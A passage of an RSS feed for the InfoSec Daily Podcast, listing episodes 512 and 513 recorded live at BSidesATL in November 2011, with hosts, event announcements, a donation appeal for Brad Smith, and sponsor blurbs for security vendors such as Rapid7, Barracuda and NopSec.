<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Milton Security Group LLC (a certified VOSB) was started in 2007 with the basic principle to make Network Security within reach of all businesses. From this basic principle, Milton Security Group has designed and developed a growing suite of security solutions. These solutions are adaptive and tailored to each customer. Milton Security Group approaches security from many angles to bring protection to the core assets of your network. This approach is flexible and allows for a quick response to the latest threats.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="97px;" src="https://lh6.googleusercontent.com/Tdg16EnNNEd9rXatrn6HIvtuual6rChlI_ubIo-weUQ_Oxx7sV7bhxEt-NHUGcTkU6YEzAxY_vKS_dGP8eUiz-sbH8gKJsJJuoshXRkDZqOwWGRCOeA" width="270px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rapid7 is the leading provider of security risk intelligence solutions.</span><br />
					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rapid7&#39;s integrated vulnerability management</span><a href="http://www.rapid7.com/products/vulnerability-management.jsp"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.rapid7.com/products/vulnerability-management.jsp</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;and penetration testing</span><a href="http://www.rapid7.com/products/penetration-testing.jsp"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.rapid7.com/products/penetration-testing.jsp</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;products, Nexpose and Metasploit, empower organizations to obtain accurate, actionable and contextual intelligence into their threat and risk posture. Rapid7&#39;s solutions are being used by more than 1,700 enterprises and government agencies in more than 65 countries, while the Company&#39;s free products are downloaded more than one million times per year and enhanced further by over 125,000 security community users and contributors. Rapid7 has been recognized as one of the fastest growing security companies worldwide by Inc. Magazine and is backed by Bain Capital Ventures. For more information about Rapid7, please visit</span><a href="http://www.rapid7.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.rapid7.com</span></a></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="209px;" src="https://lh3.googleusercontent.com/7ziAOd6oIOK5a6uS9_zYSkEteIqCL-4iHGV99YibSFpdJxUJ4v1fDvh5dO_TAc0fHJUqEv5fCWY0oAZ5GDp3GCNcib0eUrBRzNs-sTy2uighhLJFRB0" width="300px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LARES is a security consulting firm that helps companies secure electronic, physical, intellectual, and financial assets through a unique blend of assessment, testing and coaching.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We are committed to identifying the key assets of your unique business and creating a customized strategy to protect you in today&#39;s volatile business environment and beyond. Our approach allows our clients to make informed decisions about their information security programs and effectively &quot;secure what matters most&quot;.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="79px;" src="https://lh5.googleusercontent.com/P_PFriH07KpAil8eefT7ZchUavH2WxH2z2H2894CN4jkkMtsh2QeYC1J_IQaiWFo4xfh35tqFFyPap_8NQZlynOi5T6JUmKFzYOWKegdLDNE_Ve5W6k" width="253px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Founded twenty seven years ago, Sayers has grown into an industry-leading IT services and solution provider, offering the latest and most sophisticated technologies. Over the past three decades, we have established a powerful track record of success, highly personalized service and lasting client relationships.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Companies stay with Sayers because we deliver. We create customized, thoughtful solutions to meet their needs &shy; not off-the-shelf approaches, or technology companies do not need. We partner with world-class vendors.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our senior professionals are focused, customer-driven and among the most experienced in the business. Sayers is an independent, minority-owned business committed to our core values and to producing exceptional results for our customers.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="80px;" src="https://lh4.googleusercontent.com/bW95QbS4oopIOUoXaRoFLxEBCgZFyfmnYCOvN-h84LMeBWi7457e9DRk2dj8g0THR3E0jmW_h0OvXnfrrQOq_LvRs1bCQ6O0zcWDaErFtJnF6yt-NLM" width="278px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The WiKID Strong Authentication System is a patented dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens. &nbsp;The WiKID Strong Authentication Server comes as a software appliance, an ISO or in RPM format and works in conjunction with software tokens running on PCs (Windows, Mac, Linux) or smart phone to securely deliver one-time passcodes. &nbsp;WiKID uses public key cryptography allowing greater extensibility and cross-enterprise two-factor authentication without requiring multiple tokens. &nbsp;A trial version of the server is available for download.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="93px;" src="https://lh6.googleusercontent.com/YK8rZErkV28R4qaMqprvrefXOmgLYyvHwVrkfcG6bkkK90RweiB7t45RNCRzcL0Dgi1gofEHmlBHQdKLgGOz4L_mWDBO6cU6nQj0FIpwbZoUPW9sUbE" width="334px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Barracuda Networks Inc. offers industry leading products for three distinct markets. As the worldwide leader in content security appliances, Barracuda Networks offers products that protect organizations from threats over email, Web, and IM. With a strong security heritage, Barracuda Networks offers networking products that improve application delivery and network access with SSL VPN, Internet link load balancing, and server load balancing product lines. Finally, Barracuda Networks offers world-class solutions for backup and data protection that include message archiving, backup software and appliances, and offsite backup services.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="90px;" src="https://lh6.googleusercontent.com/2iHQXZt-hudD6x-00MztpYlisooCVw32fE1Gj_hSfWG67UK2P5TYJaLOcgwJZk7YuBQvVf8h5B4jt6ntQiG0wXD6EUVXkNg0-0jNG_Ajxh1mZsmCCOw" width="344px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NopSec automates cutting-edge hacking tools and techniques to simulate targeted attacks performed by hackers in the real world, and deliver to enterprises an integrated on-demand SaaS platform from the cloud to effectively identify, manage and remediate &ldquo;real&rdquo; exploitable security vulnerabilities. &nbsp;In 2011, NopSec launched the first three modules of VRM solutions, which truly differentiates from existing solutions in multiplicity of attacks, false positive verification and unified vulnerability management framework.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NopSec delivers security values to its customers via three main service</span><br />
					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">lines: &nbsp;Risk and Security Assessment Services, &nbsp;NopSec VRM on-demand Vulnerability Risk Management Solution, Security Solutions Implementation Training and Human Component Security Training.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="67px;" src="https://lh3.googleusercontent.com/Q_RJEtAkMaa-QUVOxKtACu7IbpNGCQrPiTi6hsvz6KtXCYpoYQ0sJE5ZczszKO6Cxe5pTcO7uWhclkHJGTFksu7tVH9_8WleJDajLq-YIIUUTf02YQ0" width="246px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stach &amp; Liu provides IT security consulting services to help companies secure their business, networks, and applications. Our team is comprised of industry experts and thought leaders with over 100 years of combined experience.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="83px;" src="https://lh6.googleusercontent.com/9QqqsdxYuf1xN2X-bkFZd9fmKujMsXUgcs--Z3nc4_HCi8qJNBpPvpAKGuEHz1efKwEVB47DM86D03JXU6aRqeybA0ijAaJsjDdZgT3N448_cJYw_e4" width="274px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dell Inc. (NASDAQ: DELL) listens to customers and delivers worldwide innovative technology and business solutions they trust and value. Recognized as an industry leader by top analysts, Dell SecureWorks provides world-class information security services to help organizations of all sizes protect their IT assets, comply with regulations and reduce security costs.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="288px;" src="https://lh3.googleusercontent.com/pKNNEGqAw49yOjI2_G9FZBXFBjr4sTratNxAy1848_aYJNjV43QyeJWm98wvDj_S7J2CmKLDc9tX4UCRKeA1l6hrmwRuyLHDkmb3indlPRgCw3Jsnhg" width="337px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NT OBJECTives (NTO), based in Orange County, California, brings together an innovative collection of top experts in information security and software engineering to develop and provide a comprehensive suite of industry-leading technologies and services to solve the application security challenges of today&#39;s global organizations.</span></td>
</tr>
</tbody>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-513-live-from-bsidesatl-part-2/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3076/0/infosec-daily-podcast-episode-513.mp3" length="43928909" type="audio/mpeg" />
		<itunes:duration>1:31:28</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 513 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, an[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 513 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, and Varun Sharma.
	Announcements:
	Brad smith theNurse and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	This is a recorded live stream from BSidesLV!

	Sponsors
	To make the very most of this event, we need your help! We currently are looking for sponsors. If you are interested in sponsoring, please contact Nick Owen at nowen at wikidsystems.com or Mary Catherine Petermann at mc at barracuda.com.
	We would like to thank the sponsors that have contributed to this year&#39;s event. Without you these events are not possible. THANK YOU! Our current sponsors include:







*
We&#8217;re a curious bunch that makes digital things &#8212; and not just apps or banners or sites. We bring digital to life with integrated solutions that make sense &#8212; for the companies that need them, the users that demand them and the digital world that consumes them.


*
Amidst the growing noise of polarizing security topics, hacking vs compliance religious warfare, and misunderstood risk phobias, VerSprite provides tailored security guidance that supports technology and operational objectives. &#160;VerSprite reflects a fresh take on understanding and managing risk around people, process, and technology. &#160;Focusing on GRC, AppSec, and BCM solutions, VerSprite&#39;s hybrid approach to InfoSec navigates beyond the super-hyped to a more balanced approach to functional security. Discover more atwww.versprite.com.


*
Milton Security Group LLC (a certified VOSB) was started in 2007 with the basic principle to make Network Security within reach of all businesses. From this basic principle, Milton Security Group has designed and developed a growing suite of security solutions. These solutions are adaptive and tailored to each customer. Milton Security Group approaches security from many angles to bring protection to the core assets of your network. This approach is flexible and allows for a quick response to the latest threats.


*
Rapid7 is the leading provider of security risk intelligence solutions.
					Rapid7&#39;s integrated vulnerability managementhttp://www.rapid7.com/products/vulnerability-management.jsp &#160;and penetration testinghttp://www.rapid7.com/products/penetration-testing.jsp &#160;products, Nexpose and Metasploit, empower organizations to obtain accurate, actionable and contextual intelligence into their threat and risk posture. Rapid7&#39;s solutions are being used by more than 1,700 enterprises and government agencies in more than 65 countries, while the Company&#39;s free products are downloaded more than on[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 512 &#8211; Live from BSidesATL!</title>
		<link>http://www.isdpodcast.com/episode-513-live-from-bsidesatl</link>
		<comments>http://www.isdpodcast.com/episode-513-live-from-bsidesatl#comments</comments>
		<pubDate>Fri, 04 Nov 2011 16:35:06 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3069</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 512 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, and Varun Sharma. Announcements: Brad Smith theNurse and his stroke at Hacker Halted: We all know and love Brad Smith, aka [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 512 for November 4, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith theNurse and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is a recorded live stream from BSidesLV!</span></p>
<p>
	<span style="font-size:14pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sponsors</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To make the very most of this event, we need your help! We currently are looking for sponsors. If you are interested in sponsoring, please contact Nick Owen at nowen at wikidsystems.com or Mary Catherine Petermann at mc at barracuda.com.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We would like to thank the sponsors that have contributed to this year&#39;s event. Without you these events are not possible. THANK YOU! Our current sponsors include:</span></p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="360" />
<col width="250" /></colgroup>
<tbody>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="135px;" src="https://lh4.googleusercontent.com/QQibViXw0LWhw7BpHNy-mhi_RZNUfhRd5DZrMM2tcidQiuqJrWNI0DDtxo4prTnHE-uFHKaUHzEbebNqwrKHR5NQk3XCB1ok4oBiIMsaSMDY9Pcw70Y" width="137px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&rsquo;re a curious bunch that makes digital things &mdash; and not just apps or banners or sites. We bring digital to life with integrated solutions that make sense &mdash; for the companies that need them, the users that demand them and the digital world that consumes them.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="107px;" src="https://lh6.googleusercontent.com/ragMJtOWTheH01nk387gLoxRs8K4maytkSDm-6Eob6tSp-pe2OAWz-bGGG2ah-dtjfKCNwMWpkKrws2MJ_nTGoWuSZFSTtjq87oZnjqCdmU0Epr_Jw4" width="263px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amidst the growing noise of polarizing security topics, hacking vs compliance religious warfare, and misunderstood risk phobias, VerSprite provides tailored security guidance that supports technology and operational objectives. &nbsp;VerSprite reflects a fresh take on understanding and managing risk around people, process, and technology. &nbsp;Focusing on GRC, AppSec, and BCM solutions, VerSprite&#39;s hybrid approach to InfoSec navigates beyond the super-hyped to a more balanced approach to functional security. Discover more at</span><a href="http://www.versprite.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.versprite.com</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="111px;" src="https://lh4.googleusercontent.com/DcO7JVPgea2r3FJQpzMUBlVMLsjMQ-nDxW8HsgmYdSjZVKS1Wnf3tmppQ6FpY20hg_vPgAo5rbt0bFUfeLWj2huSKbxs4g5KU5m4RWyHk0tzmc_ycqA" width="252px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Milton Security Group LLC (a certified VOSB) was started in 2007 with the basic principle to make Network Security within reach of all businesses. From this basic principle, Milton Security Group has designed and developed a growing suite of security solutions. These solutions are adaptive and tailored to each customer. Milton Security Group approaches security from many angles to bring protection to the core assets of your network. This approach is flexible and allows for a quick response to the latest threats.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="97px;" src="https://lh6.googleusercontent.com/Tdg16EnNNEd9rXatrn6HIvtuual6rChlI_ubIo-weUQ_Oxx7sV7bhxEt-NHUGcTkU6YEzAxY_vKS_dGP8eUiz-sbH8gKJsJJuoshXRkDZqOwWGRCOeA" width="270px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rapid7 is the leading provider of security risk intelligence solutions.</span><br />
					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rapid7&#39;s integrated vulnerability management</span><a href="http://www.rapid7.com/products/vulnerability-management.jsp"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.rapid7.com/products/vulnerability-management.jsp</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;and penetration testing</span><a href="http://www.rapid7.com/products/penetration-testing.jsp"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.rapid7.com/products/penetration-testing.jsp</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;products, Nexpose and Metasploit, empower organizations to obtain accurate, actionable and contextual intelligence into their threat and risk posture. Rapid7&#39;s solutions are being used by more than 1,700 enterprises and government agencies in more than 65 countries, while the Company&#39;s free products are downloaded more than one million times per year and enhanced further by over 125,000 security community users and contributors. Rapid7 has been recognized as one of the fastest growing security companies worldwide by Inc. Magazine and is backed by Bain Capital Ventures. For more information about Rapid7, please visit</span><a href="http://www.rapid7.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.rapid7.com</span></a></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="209px;" src="https://lh3.googleusercontent.com/7ziAOd6oIOK5a6uS9_zYSkEteIqCL-4iHGV99YibSFpdJxUJ4v1fDvh5dO_TAc0fHJUqEv5fCWY0oAZ5GDp3GCNcib0eUrBRzNs-sTy2uighhLJFRB0" width="300px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LARES is a security consulting firm that helps companies secure electronic, physical, intellectual, and financial assets through a unique blend of assessment, testing and coaching.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We are committed to identifying the key assets of your unique business and creating a customized strategy to protect you in today&#39;s volatile business environment and beyond. Our approach allows our clients to make informed decisions about their information security programs and effectively &quot;secure what matters most&quot;.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="79px;" src="https://lh5.googleusercontent.com/P_PFriH07KpAil8eefT7ZchUavH2WxH2z2H2894CN4jkkMtsh2QeYC1J_IQaiWFo4xfh35tqFFyPap_8NQZlynOi5T6JUmKFzYOWKegdLDNE_Ve5W6k" width="253px;" />*</td>
